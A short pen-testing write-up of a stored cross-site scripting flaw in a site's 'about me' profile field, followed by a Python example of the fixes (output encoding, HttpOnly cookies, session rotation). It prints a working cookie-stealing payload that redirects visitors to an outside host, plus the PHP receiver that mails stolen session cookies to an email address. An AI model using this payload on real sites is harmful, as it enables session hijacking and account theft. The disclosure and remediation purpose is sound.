Pen testing report (1)

I implanted the following in my "about me" profile in letslink.org/london:

 

<script>document.location= "http://cxss.org.uk/cookie-monster.php?cookie_val=" + document.cookie</script>

 

Now if you visit my profile, your session cookie will be immediately passed to cookie-monster.php, which will in turn mail me the session cookie's value.

 

Here's cookie-monster.php's body:

 

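<?php
// Read the cookie string the injected script appended to the query string.
$cookie_value = $_GET["cookie_val"];

// Forward it by e-mail.
mail("proggaprogga@gmail.com", "Cookie values", $cookie_value,
     "From: cookie.monster@cxss.org.uk");
?>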

Another thing I noticed was that the value of the session cookie remained the same every time I logged in.
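
The server-side fixes for the two findings above, as an added example that is not part of the original report or the site's own code: encode the stored "about me" text on output, mark the session cookie HttpOnly so `document.cookie` cannot read it, and issue a new session id at each login. The site's stack is not stated, so this uses Python's standard library; the function names, the `session` cookie name and the in-memory store are assumptions.

```python
import html
import secrets
from http.cookies import SimpleCookie

# Constructed sample: the profile text from the report, stored as an "about me".
PAYLOAD = ('<script>document.location= "http://cxss.org.uk/cookie-monster.php'
           '?cookie_val=" + document.cookie</script>')

SESSIONS = {}  # hypothetical in-memory session store: session id -> username


def render_about_me(text):
    """HTML-encode stored profile text so the browser displays it as text."""
    return '<div class="about-me">' + html.escape(text, quote=True) + "</div>"


def session_cookie_header(session_id):
    """Build a Set-Cookie value that page scripts cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True   # not exposed through document.cookie
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def login(username, old_session_id=None):
    """Issue a fresh random session id at every login and retire the old one."""
    SESSIONS.pop(old_session_id, None)
    new_id = secrets.token_urlsafe(32)
    SESSIONS[new_id] = username
    return new_id


def logout(session_id):
    """Invalidate the id server-side so a captured value stops working."""
    SESSIONS.pop(session_id, None)


if __name__ == "__main__":
    print(render_about_me(PAYLOAD))
    first = login("alice")
    second = login("alice", first)
    print(session_cookie_header(second))
    print("rotated:", first != second, "old id still valid:", first in SESSIONS)
```

Output encoding is the primary fix; HttpOnly and session rotation limit what a missed injection point can yield.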